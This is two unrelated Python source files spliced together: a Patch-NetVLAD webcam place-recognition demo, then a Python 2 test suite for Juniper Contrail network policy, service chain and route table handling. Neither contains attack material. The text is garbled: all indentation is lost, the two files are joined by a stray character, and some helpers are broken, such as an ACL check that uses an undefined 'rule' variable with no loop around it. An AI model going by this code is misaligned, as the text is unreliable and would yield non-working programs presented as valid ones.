for this_inlier_keypoints_one, this_inlier_keypoints_two in zip(inlier_keypoints_one, inlier_keypoints_two):
for i in range(this_inlier_keypoints_one.shape[0]):
kp_all1.append(cv2.KeyPoint(this_inlier_keypoints_one[i, 0].astype(float), this_inlier_keypoints_one[i, 1].astype(float), 1, -1, 0, 0, -1))
kp_all2.append(cv2.KeyPoint(this_inlier_keypoints_two[i, 0].astype(float), this_inlier_keypoints_two[i, 1].astype(float), 1, -1, 0, 0, -1))
matches_all.append(cv2.DMatch(i, i, 0))
im_allpatch_matches = cv2.drawMatches(im1, kp_all1, im2, kp_all2,
matches_all, None, matchColor=(0, 255, 0), flags=cv2.DRAW_MATCHES_FLAGS_NOT_DRAW_SINGLE_POINTS)
cv2.putText(im_allpatch_matches, f"Retrieved Image: {image_index} ({score:.5})", (10, 20), cv2.FONT_HERSHEY_PLAIN, 1.5, (0,0,255), 2)
cv2.imshow(window_name, im_allpatch_matches)
def feature_extract(model, device, config, img):
pool_size = int(config['global_params']['num_pcs'])
model.eval()
it = input_transform((int(config['feature_extract']['imageresizeH']), int(config['feature_extract']['imageresizeW'])))
im_one_pil = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
im_one_pil = it(im_one_pil).unsqueeze(0)
input_data = im_one_pil.to(device)
tqdm.write('====> Extracting Features')
with torch.no_grad():
image_encoding = model.encoder(input_data)
vlad_local, vlad_global = model.pool(image_encoding)
vlad_global_pca = get_pca_encoding(model, vlad_global).cpu().numpy()
local_feats_one = []
for this_iter, this_local in enumerate(vlad_local):
this_local_feats = get_pca_encoding(model, this_local.permute(2, 0, 1).reshape(-1, this_local.size(1))). \
reshape(this_local.size(2), this_local.size(0), pool_size).permute(1, 2, 0)
local_feats_one.append(torch.transpose(this_local_feats[0, :, :], 0, 1))
return local_feats_one, vlad_global_pca
def feature_match(eval_set, device, opt, config, im_query, local_feat, query_global_feat):
# input_query_local_features_prefix = join(opt.query_input_features_dir, 'patchfeats')
# input_query_global_features_prefix = join(opt.query_input_features_dir, 'globalfeats.npy')
input_index_local_features_prefix = join(opt.index_input_features_dir, 'patchfeats')
input_index_global_features_prefix = join(opt.index_input_features_dir, 'globalfeats.npy')
pool_size = query_global_feat.shape[1]
dbFeat = np.load(input_index_global_features_prefix)
if dbFeat.dtype != np.float32:
query_global_feat = query_global_feat.astype('float32')
dbFeat = dbFeat.astype('float32')
tqdm.write('====> Building faiss index')
faiss_index = faiss.IndexFlatL2(pool_size)
# noinspection PyArgumentList
faiss_index.add(dbFeat)
n_values = []
for n_value in config['feature_match']['n_values_all'].split(","): # remove all instances of n that are bigger than maxK
n_values.append(int(n_value))
tqdm.write('====> Matching Global Features')
if config['feature_match']['pred_input_path'] != 'None':
predictions = np.load(config['feature_match']['pred_input_path']) # optionally load predictions from a np file
else:
# noinspection PyArgumentList
# _, predictions = faiss_index.search(global_feat, min(len(global_feat), max(n_values)))
_, predictions = faiss_index.search(query_global_feat, 3)
tqdm.write('====> Loading patch param from config')
patch_sizes = [int(s) for s in config['global_params']['patch_sizes'].split(",")]
strides = [int(s) for s in config['global_params']['strides'].split(",")]
patch_weights = np.array(config['feature_match']['patchWeights2Use'].split(",")).astype(float)
all_keypoints = []
all_indices = []
tqdm.write('====> Matching Local Features')
for patch_size, stride in zip(patch_sizes, strides):
# we currently only provide support for square patches, but this can be easily modified for future works
keypoints, indices = calc_keypoint_centers_from_patches(config['feature_match'], patch_size, patch_size, stride, stride)
all_keypoints.append(keypoints)
all_indices.append(indices)
matcher = PatchMatcher(config['feature_match']['matcher'], patch_sizes, strides, all_keypoints,
all_indices)
reordered_preds = []
for q_idx, pred in enumerate(tqdm(predictions, leave=False, desc='Patch compare pred')):
diffs = np.zeros((predictions.shape[1], len(patch_sizes)))
# we pre-transpose here to save compute speed
for k, candidate in enumerate(pred):
image_name_index = os.path.splitext(os.path.basename(eval_set.images[candidate]))[0]
dbfeat = []
for patch_size in patch_sizes:
dbfilename = input_index_local_features_prefix + '_' + 'psize{}_'.format(patch_size) + image_name_index + '.npy'
dbfeat.append(torch.tensor(np.load(dbfilename), device=device))
if k == 0:
# Get the NetVLAD top candidate's keypoints and score
scores, keypoints_net_one, keypoints_net_two = matcher.match(local_feat, dbfeat)
diffs[k, :] = scores
score_net = -apply_patch_weights(scores, len(patch_sizes), patch_weights)
print(f"NetVLAD: Similarity score between the two images is: {score_net:.5f}. Larger is better.")
else:
diffs[k, :], _, _ = matcher.match(local_feat, dbfeat)
diffs = normalise_func(diffs, len(patch_sizes), patch_weights)
cand_sorted = np.argsort(diffs)
reordered_preds.append(pred[cand_sorted])
# Top candidates from two methods
image_name_index_net = os.path.splitext(os.path.basename(eval_set.images[predictions[0][0]]))[0]
image_name_index_patch = os.path.splitext(os.path.basename(eval_set.images[reordered_preds[0][0]]))[0]
# Get the Patch-NetVLAD top candidate's keypoints and score
dbfeat = []
for patch_size in patch_sizes:
dbfilename = input_index_local_features_prefix + '_' + 'psize{}_'.format(patch_size) + image_name_index_patch + '.npy'
dbfeat.append(torch.tensor(np.load(dbfilename), device=device))
scores, keypoints_patch_one, keypoints_patch_two = matcher.match(local_feat, dbfeat)
score_patch = -apply_patch_weights(scores, len(patch_sizes), patch_weights)
print(f"Patch-NetVLAD: Similarity score between the two images is: {score_patch:.5f}. Larger is better.")
print('predictions: ', predictions[0])
print('reordered_preds: ', reordered_preds[0])
# Show the most possible retrieved image
image_list_array = np.array(eval_set.images)
im_db_net = cv2.imread(image_list_array[predictions[0]][0])
im_db_patch = cv2.imread(image_list_array[reordered_preds[0]][0])
# using cv2 for their in-built keypoint correspondence plotting tools
im_query = cv2.resize(im_query, (int(config['feature_extract']['imageresizeW']), int(config['feature_extract']['imageresizeH'])))
im_db_net = cv2.resize(im_db_net, (int(config['feature_extract']['imageresizeW']), int(config['feature_extract']['imageresizeH'])))
im_db_patch = cv2.resize(im_db_patch, (int(config['feature_extract']['imageresizeW']), int(config['feature_extract']['imageresizeH'])))
# cv2 resize slightly different from torch, but for visualisation only not a big problem
if config['feature_match']['matcher'] == 'RANSAC':
# Draw local matches
plot_two(im_query, im_db_net, keypoints_net_one, keypoints_net_two, score_net, image_name_index_net, 'NetVLAD')
plot_two(im_query, im_db_patch, keypoints_patch_one, keypoints_patch_two, score_patch, image_name_index_patch, 'Patch-NetVLAD')
else:
cv2.imshow('NetVLAD Top Match', im_db_net)
cv2.imshow('Patch-NetVLAD Top Match', im_db_patch)
def main():
parser = argparse.ArgumentParser(description='Patch-NetVLAD-Feature-Match')
parser.add_argument('--config_path', type=str, default=join(PATCHNETVLAD_ROOT_DIR, 'configs/performance.ini'),
help='File name (with extension) to an ini file that stores most of the configuration data for patch-netvlad')
parser.add_argument('--dataset_root_dir', type=str, default='',
help='If the files in query_file_path and index_file_path are relative, use dataset_root_dir as prefix.')
parser.add_argument('--index_file_path', type=str, required=True,
help='Path (with extension) to a text file that stores the save location and name of all database images in the dataset')
parser.add_argument('--index_input_features_dir', type=str, required=True,
help='Path to load all database patch-netvlad features')
parser.add_argument('--nocuda', action='store_true', help='If true, use CPU only. Else use GPU.')
opt = parser.parse_args()
print(opt)
# load config file
configfile = opt.config_path
assert os.path.isfile(configfile)
config = configparser.ConfigParser()
config.read(configfile)
# check GPU/cuda
cuda = not opt.nocuda
if cuda and not torch.cuda.is_available():
raise Exception("No GPU found, please run with --nocuda")
device = torch.device("cuda" if cuda else "cpu")
# load model
encoder_dim, encoder = get_backend()
# must load from a resume to do extraction
resume_ckpt = config['global_params']['resumePath'] + config['global_params']['num_pcs'] + '.pth.tar'
# backup: try whether resume_ckpt is relative to script path
if not isfile(resume_ckpt):
resume_ckpt = join(PATCHNETVLAD_ROOT_DIR, resume_ckpt)
if not isfile(resume_ckpt):
from download_models import download_all_models
download_all_models(ask_for_permission=True)
if isfile(resume_ckpt):
print("=> loading checkpoint '{}'".format(resume_ckpt))
checkpoint = torch.load(resume_ckpt, map_location=lambda storage, loc: storage)
assert checkpoint['state_dict']['WPCA.0.bias'].shape[0] == int(config['global_params']['num_pcs'])
config['global_params']['num_clusters'] = str(checkpoint['state_dict']['pool.centroids'].shape[0])
model = get_model(encoder, encoder_dim, opt, config['global_params'], append_pca_layer=True)
if int(config['global_params']['nGPU']) > 1 and torch.cuda.device_count() > 1:
model.encoder = nn.DataParallel(model.encoder)
model.pool = nn.DataParallel(model.pool)
model.load_state_dict(checkpoint['state_dict'])
model = model.to(device)
print("=> loaded checkpoint '{}'".format(resume_ckpt, ))
else:
raise FileNotFoundError("=> no checkpoint found at '{}'".format(resume_ckpt))
# check database path
if not os.path.isfile(opt.index_file_path):
opt.index_file_path = join(PATCHNETVLAD_ROOT_DIR, 'dataset_imagenames', opt.index_file_path)
vid = cv2.VideoCapture(0)
vid.set(cv2.CAP_PROP_BUFFERSIZE, 1)
vid.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
vid.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
start = time.time()
while(True):
_, frame = vid.read()
# extract query feature
local_feat, global_feat = feature_extract(model, device, config, frame)
dataset = PlaceDataset(None, opt.index_file_path, opt.dataset_root_dir, None, config['feature_extract'])
# match feature
feature_match(dataset, device, opt, config, frame, local_feat, global_feat)
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
elif key & 0xFF == ord('n'):
print('why press \'n\'?')
end = time.time()
elapse = end - start
start = end
print(f"FPS: {1/elapse}")
cv2.putText(frame, f"FPS: {1/elapse}", (10, 20), cv2.FONT_HERSHEY_PLAIN, 1.5, (0,128,128), 1)
cv2.imshow('Query Image', frame)
vid.release()
cv2.destroyAllWindows()
torch.cuda.empty_cache() # garbage clean GPU memory, a bug can occur when Pytorch doesn't automatically clear the
# memory after runs
if __name__ == "__main__":
main() |
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import gevent
sys.path.append("../common/tests")
from testtools.matchers import Equals, Contains, Not
from test_utils import *
import test_common
import test_case
from vnc_api.vnc_api import *
try:
import to_bgp
except ImportError:
from schema_transformer import to_bgp
from time import sleep
def retry_exc_handler(tries_remaining, exception, delay):
print >> sys.stderr, "Caught '%s', %d tries remaining, sleeping for %s seconds" % (exception, tries_remaining, delay)
def retries(max_tries, delay=1, backoff=2, exceptions=(Exception,), hook=None):
def dec(func):
def f2(*args, **kwargs):
mydelay = delay
tries = range(max_tries)
tries.reverse()
for tries_remaining in tries:
try:
return func(*args, **kwargs)
except exceptions as e:
if tries_remaining > 0:
if hook is not None:
hook(tries_remaining, e, mydelay)
sleep(mydelay)
mydelay = mydelay * backoff
else:
raise
else:
break
return f2
return dec
class TestPolicy(test_case.STTestCase):
@retries(5, hook=retry_exc_handler)
def check_service_chain_prefix_match(self, fq_name, prefix):
ri = self._vnc_lib.routing_instance_read(fq_name)
sci = ri.get_service_chain_information()
if sci is None:
print "retrying ... ", test_common.lineno()
raise NoIdError
self.assertEqual(sci.prefix[0], prefix)
@retries(5, hook=retry_exc_handler)
def check_ri_rt_state_vn_policy(self, fq_name, to_fq_name, expect_to_find):
ri = self._vnc_lib.routing_instance_read(fq_name)
rt_refs = ri.get_route_target_refs()
if not rt_refs:
print "retrying ... ", test_common.lineno()
raise NoIdError
found = False
for rt_ref in rt_refs:
rt_obj = self._vnc_lib.route_target_read(id=rt_ref['uuid'])
ri_refs = rt_obj.get_routing_instance_back_refs()
for ri_ref in ri_refs:
if ri_ref['to'] == to_fq_name:
found = True
break
if found == True:
break
self.assertTrue(found == expect_to_find)
@retries(5, hook=retry_exc_handler)
def check_ri_state_vn_policy(self, fq_name, to_fq_name):
ri = self._vnc_lib.routing_instance_read(fq_name)
ri_refs = ri.get_routing_instance_refs()
if not ri_refs:
print "retrying ... ", test_common.lineno()
raise NoIdError
self.assertEqual(ri_refs[0]['to'], to_fq_name)
@retries(5, hook=retry_exc_handler)
def check_ri_refs_are_deleted(self, fq_name):
ri = self._vnc_lib.routing_instance_read(fq_name)
ri_refs = ri.get_routing_instance_refs()
if ri_refs:
print "retrying ... ", test_common.lineno()
raise Exception
@retries(5, hook=retry_exc_handler)
def check_vn_is_deleted(self, uuid):
try:
self._vnc_lib.virtual_network_read(id=uuid)
print "retrying ... ", test_common.lineno()
raise Exception
except NoIdError:
print 'vn deleted'
@retries(5, hook=retry_exc_handler)
def check_ri_is_deleted(self, fq_name):
try:
self._vnc_lib.routing_instance_read(fq_name)
print "retrying ... ", test_common.lineno()
raise Exception
except NoIdError:
print 'ri deleted'
@retries(5, hook=retry_exc_handler)
def check_ri_is_present(self, fq_name):
self._vnc_lib.routing_instance_read(fq_name)
@retries(5, hook=retry_exc_handler)
def check_link_in_ifmap_graph(self, fq_name_str, links):
self._vnc_lib.routing_instance_read(fq_name)
@retries(5, hook=retry_exc_handler)
def wait_to_get_sc(self):
sc = [x for x in to_bgp.ServiceChain]
if len(sc) == 0:
print "retrying ... ", test_common.lineno()
raise Exception
return sc
@retries(5, hook=retry_exc_handler)
def check_acl_match_dst_cidr(self, fq_name, ip_prefix, ip_len):
acl = self._vnc_lib.access_control_list_read(fq_name)
if (rule.match_condition.dst_address.subnet is not None and
rule.match_condition.dst_address.subnet.ip_prefix == ip_prefix and
rule.match_condition.dst_address.subnet.ip_prefix_len == ip_len):
return
raise Exception('prefix %s/%d not found in ACL rules for %s' %
(ip_prefix, ip_len, fq_name))
def test_basic_policy(self):
vn1_name = 'vn1'
vn2_name = 'vn2'
vn1_obj = VirtualNetwork(vn1_name)
vn2_obj = VirtualNetwork(vn2_name)
np = self.create_network_policy(vn1_obj, vn2_obj)
seq = SequenceType(1, 1)
vnp = VirtualNetworkPolicyType(seq)
vn1_obj.set_network_policy(np, vnp)
vn2_obj.set_network_policy(np, vnp)
vn1_uuid = self._vnc_lib.virtual_network_create(vn1_obj)
vn2_uuid = self._vnc_lib.virtual_network_create(vn2_obj)
for obj in [vn1_obj, vn2_obj]:
ident_name = self.get_obj_imid(obj)
gevent.sleep(2)
ifmap_ident = self.assertThat(FakeIfmapClient._graph, Contains(ident_name))
try:
self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'])
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'],
to_fq_name=[u'default-domain', u'default-project', u'vn1', u'vn1'])
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
vn1_obj.del_network_policy(np)
vn2_obj.del_network_policy(np)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
try:
self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
except Exception, e:
print "failed : ri refs are still present in routing instance [vn2]... ", test_common.lineno()
self.assertTrue(False)
self.delete_network_policy(np)
self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
try:
self.check_vn_is_deleted(uuid=vn1_obj.uuid)
except Exception, e:
print "failed : vn1 is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
except Exception, e:
print "failed : ri1 is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
# end test_basic_policy
def test_multiple_policy(self):
vn1_name = 'vn1'
vn2_name = 'vn2'
vn1_obj = VirtualNetwork(vn1_name)
vn2_obj = VirtualNetwork(vn2_name)
np1 = self.create_network_policy(vn1_obj, vn2_obj)
np2 = self.create_network_policy(vn2_obj, vn1_obj)
seq = SequenceType(1, 1)
vnp = VirtualNetworkPolicyType(seq)
vn1_obj.set_network_policy(np1, vnp)
vn2_obj.set_network_policy(np2, vnp)
vn1_uuid = self._vnc_lib.virtual_network_create(vn1_obj)
vn2_uuid = self._vnc_lib.virtual_network_create(vn2_obj)
try:
self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'])
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'],
to_fq_name=[u'default-domain', u'default-project', u'vn1', u'vn1'])
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
np1.network_policy_entries.policy_rule[0].action_list.simple_action = 'deny'
np1.set_network_policy_entries(np1.network_policy_entries)
self._vnc_lib.network_policy_update(np1)
expr ="('contrail:connection contrail:routing-instance:default-domain:default-project:vn2:vn2' in FakeIfmapClient._graph['contrail:routing-instance:default-domain:default-project:vn1:vn1']['links'])"
self.assertTill(expr)
np1.network_policy_entries.policy_rule[0].action_list.simple_action = 'pass'
np1.set_network_policy_entries(np1.network_policy_entries)
self._vnc_lib.network_policy_update(np1)
np2.network_policy_entries.policy_rule[0].action_list.simple_action = 'deny'
np2.set_network_policy_entries(np2.network_policy_entries)
self._vnc_lib.network_policy_update(np2)
expr = "('contrail:connection contrail:routing-instance:default-domain:default-project:vn1:vn1' in FakeIfmapClient._graph['contrail:routing-instance:default-domain:default-project:vn2:vn2']['links'])"
self.assertTill(expr)
vn1_obj.del_network_policy(np1)
vn2_obj.del_network_policy(np2)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
try:
self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
except Exception, e:
print "failed : ri refs are still present in routing instance [vn2]... ", test_common.lineno()
self.assertTrue(False)
self.delete_network_policy(np1)
self.delete_network_policy(np2)
self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
try:
self.check_vn_is_deleted(uuid=vn1_obj.uuid)
except Exception, e:
print "failed : vn1 is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
# end test_multiple_policy
def test_policy_in_policy(self):
vn1_name = 'vn1'
vn2_name = 'vn2'
vn3_name = 'vn3'
vn1_obj = VirtualNetwork(vn1_name)
vn2_obj = VirtualNetwork(vn2_name)
np1 = self.create_network_policy(vn1_obj, vn2_obj)
np2 = self.create_network_policy(vn2_obj, vn1_obj)
np1.network_policy_entries.policy_rule[0].dst_addresses[0].virtual_network = None
np1.network_policy_entries.policy_rule[0].dst_addresses[0].network_policy = np2.get_fq_name_str()
np1.set_network_policy_entries(np1.network_policy_entries)
self._vnc_lib.network_policy_update(np1)
np2.network_policy_entries.policy_rule[0].src_addresses[0].virtual_network = 'local'
np2.set_network_policy_entries(np1.network_policy_entries)
self._vnc_lib.network_policy_update(np2)
seq = SequenceType(1, 1)
vnp = VirtualNetworkPolicyType(seq)
vn1_obj.set_network_policy(np1, vnp)
vn2_obj.set_network_policy(np2, vnp)
vn1_uuid = self._vnc_lib.virtual_network_create(vn1_obj)
vn2_uuid = self._vnc_lib.virtual_network_create(vn2_obj)
try:
self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'])
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'],
to_fq_name=[u'default-domain', u'default-project', u'vn1', u'vn1'])
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
vn3_obj = VirtualNetwork(vn3_name)
vn3_obj.set_network_policy(np2, vnp)
vn3_uuid = self._vnc_lib.virtual_network_create(vn3_obj)
try:
self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn3', 'vn3'],
to_fq_name=[u'default-domain', u'default-project', u'vn1', u'vn1'])
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
vn3_obj.del_network_policy(np2)
self._vnc_lib.virtual_network_update(vn3_obj)
@retries(5, hook=retry_exc_handler)
def _match_acl_rule():
acl = self._vnc_lib.access_control_list_read(
fq_name=[u'default-domain', u'default-project',
'vn1', 'vn1'])
for rule in acl.get_access_control_list_entries().get_acl_rule():
if rule.match_condition.dst_address.virtual_network == vn3_obj.get_fq_name_str():
raise Exception("ACL rule still present")
_match_acl_rule()
vn1_obj.del_network_policy(np1)
vn2_obj.del_network_policy(np2)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
self.delete_network_policy(np1)
self.delete_network_policy(np2)
self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
self._vnc_lib.virtual_network_delete(fq_name=vn3_obj.get_fq_name())
try:
self.check_vn_is_deleted(uuid=vn1_obj.uuid)
except Exception, e:
print "failed : vn1 is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
# end test_multiple_policy
def test_service_policy(self):
# create vn1
vn1_obj = VirtualNetwork('vn1')
ipam_obj = NetworkIpam('ipam1')
self._vnc_lib.network_ipam_create(ipam_obj)
vn1_obj.add_network_ipam(ipam_obj, VnSubnetsType(
[IpamSubnetType(SubnetType("10.0.0.0", 24))]))
self._vnc_lib.virtual_network_create(vn1_obj)
# create vn2
vn2_obj = VirtualNetwork('vn2')
ipam_obj = NetworkIpam('ipam2')
self._vnc_lib.network_ipam_create(ipam_obj)
vn2_obj.add_network_ipam(ipam_obj, VnSubnetsType(
[IpamSubnetType(SubnetType("172.16.17.32", 24))]))
self._vnc_lib.virtual_network_create(vn2_obj)
np = self.create_network_policy(vn1_obj, vn2_obj, ["s1"])
seq = SequenceType(1, 1)
vnp = VirtualNetworkPolicyType(seq)
vn1_obj.clear_pending_updates()
vn2_obj.clear_pending_updates()
vn1_obj.set_network_policy(np, vnp)
vn2_obj.set_network_policy(np, vnp)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
try:
sc = self.wait_to_get_sc()
sc_ri_name = 'service-'+sc[0]+'-default-domain_default-project_s1'
except Exception, e:
print "failed: unable to fetch to_bgp.service_chain"
self.assertTrue(False)
try:
self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
to_fq_name=[u'default-domain', u'default-project', u'vn1', sc_ri_name], expect_to_find=True)
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name],
to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'], expect_to_find=True)
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_service_chain_prefix_match(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name],
prefix='10.0.0.0/24')
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
vn1_obj.del_network_policy(np)
vn2_obj.del_network_policy(np)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
try:
self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
except Exception, e:
print "failed : ri refs are still present in routing instance [vn2]... ", test_common.lineno()
self.assertTrue(False)
self.delete_network_policy(np)
self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
try:
self.check_vn_is_deleted(uuid=vn1_obj.uuid)
except Exception, e:
print "failed : vn1 is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
except Exception, e:
print "failed : ri1 is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
# end test_service_policy
# end class TestPolicy
#class TestRouteTable(test_case.STTestCase):
def test_add_delete_route(self):
lvn = self.create_virtual_network("lvn", "10.0.0.0/24")
rvn = self.create_virtual_network("rvn", "172.16.17.32/24")
np = self.create_network_policy(lvn, rvn, ["s1"], "in-network")
vn = self.create_virtual_network("vn100", "1.0.0.0/24")
rt = RouteTable("rt1")
self._vnc_lib.route_table_create(rt)
vn.add_route_table(rt)
self._vnc_lib.virtual_network_update(vn)
routes = RouteTableType()
route = RouteType(
prefix="0.0.0.0/0", next_hop="default-domain:default-project:s1")
routes.add_route(route)
rt.set_routes(routes)
self._vnc_lib.route_table_update(rt)
@retries(5, hook=retry_exc_handler)
def _match_route_table():
lvn = self._vnc_lib.virtual_network_read(id=lvn.uuid)
sc = [x for x in to_bgp.ServiceChain]
if len(sc) == 0:
raise Exception("sc has 0 len")
sc_ri_name = 'service-'+sc[0]+'-default-domain_default-project_s1'
lri = self._vnc_lib.routing_instance_read(
fq_name=['default-domain', 'default-project', 'lvn', sc_ri_name])
sr = lri.get_static_route_entries()
if sr is None:
raise Exception("sr is None")
route = sr.route[0]
self.assertEqual(route.prefix, "0.0.0.0/0")
self.assertEqual(route.next_hop, "10.0.0.253")
ri100 = self._vnc_lib.routing_instance_read(
fq_name=[
'default-domain', 'default-project', 'vn100', 'vn100'])
rt100 = ri100.get_route_target_refs()[0]['to']
for rt_ref in lri.get_route_target_refs() or []:
if rt100 == rt_ref['to']:
return
raise Exception("rt100 route-target ref not found")
_match_route_table()
routes.set_route([])
rt.set_routes(route)
self._vnc_lib.route_table_update(rt)
@retries(5, hook=retry_exc_handler)
def _match_route_table_cleanup():
lri = self._vnc_lib.routing_instance_read(
fq_name=['default-domain', 'default-project', 'lvn', sc_ri_name])
sr = lri.get_static_route_entries()
if sr and sr.route:
raise Exception("sr has route")
ri = self._vnc_lib.routing_instance_read(
fq_name=['default-domain', 'default-project', 'lvn', 'lvn'])
rt_refs = ri.get_route_target_refs()
for rt_ref in ri.get_route_target_refs() or []:
if rt100 == rt_ref['to']:
raise Exception("rt100 route-target ref found")
_match_route_table_cleanup()
self._vnc_lib.virtual_network_delete(
fq_name=['default-domain', 'default-project', 'vn100'])
self.delete_network_policy(np, auto_policy=True)
gevent.sleep(2)
self._vnc_lib.virtual_network_delete(
fq_name=['default-domain', 'default-project', 'lvn'])
self._vnc_lib.virtual_network_delete(
fq_name=['default-domain', 'default-project', 'rvn'])
# test_add_delete_route
def test_vn_delete(self):
vn = self.create_virtual_network("vn", "10.1.1.0/24")
gevent.sleep(2)
for obj in [vn]:
ident_name = self.get_obj_imid(obj)
ifmap_ident = self.assertThat(FakeIfmapClient._graph, Contains(ident_name))
try:
self.check_vn_ri_state(fq_name=[u'default-domain', u'default-project', 'vn', 'vn'])
except NoIdError, e:
print "failed : routing instance state is not created ... ", test_common.lineno()
self.assertTrue(False)
# stop st
self._st_greenlet.kill()
gevent.sleep(5)
# delete vn in api server
self._vnc_lib.virtual_network_delete(
fq_name=['default-domain', 'default-project', 'vn'])
# start st on a free port
self._st_greenlet = gevent.spawn(test_common.launch_schema_transformer,
self._api_server_ip, self._api_server_port)
gevent.sleep(2)
# check if vn is deleted
try:
self.check_vn_is_deleted(uuid=vn.uuid)
except Exception, e:
print "failed : vn is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
# check if ri is deleted
try:
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn', 'vn'])
except Exception, e:
print "failed : routing instance is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
# test_vn_delete
@retries(5, hook=retry_exc_handler)
def check_vn_ri_state(self, fq_name):
ri = self._vnc_lib.routing_instance_read(fq_name)
def test_policy_with_cidr(self):
vn1 = self.create_virtual_network("vn1", "10.1.1.0/24")
vn2 = self.create_virtual_network("vn2", "10.2.1.0/24")
rules = []
rule1 = { "protocol": "icmp",
"direction": "<>",
"src-port": "any",
"src": {"type": "vn", "value": vn1},
"dst": {"type": "cidr", "value": "10.2.1.1/32"},
"dst-port": "any",
"action": "deny"
}
rule2 = { "protocol": "icmp",
"direction": "<>",
"src-port": "any",
"src": {"type": "vn", "value": vn1},
"dst": {"type": "cidr", "value": "10.2.1.2/32"},
"dst-port": "any",
"action": "deny"
}
rules.append(rule1)
rules.append(rule2)
np = self.create_network_policy_with_multiple_rules(rules)
seq = SequenceType(1, 1)
vnp = VirtualNetworkPolicyType(seq)
vn1.set_network_policy(np, vnp)
self._vnc_lib.virtual_network_update(vn1)
for obj in [vn1]:
ident_name = self.get_obj_imid(obj)
gevent.sleep(2)
ifmap_ident = self.assertThat(FakeIfmapClient._graph, Contains(ident_name))
try:
self.check_vn_ri_state(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
except NoIdError, e:
print "failed : Routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_acl_match_dst_cidr(
fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
ip_prefix="10.2.1.1", ip_len=32)
self.check_acl_match_dst_cidr(
fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
ip_prefix="10.2.1.2", ip_len=32)
except NoIdError, e:
print "failed : acl match cidr... ", test_common.lineno()
self.assertTrue(False)
except Exception, e:
print "failed : acl match cidr... ", test_common.lineno()
self.assertTrue(False)
#cleanup
self.delete_network_policy(np, auto_policy=True)
self._vnc_lib.virtual_network_delete(
fq_name=['default-domain', 'default-project', 'vn1'])
# test st restart while service chain is configured
def test_st_restart_service_chain_delete(self):
# create vn1
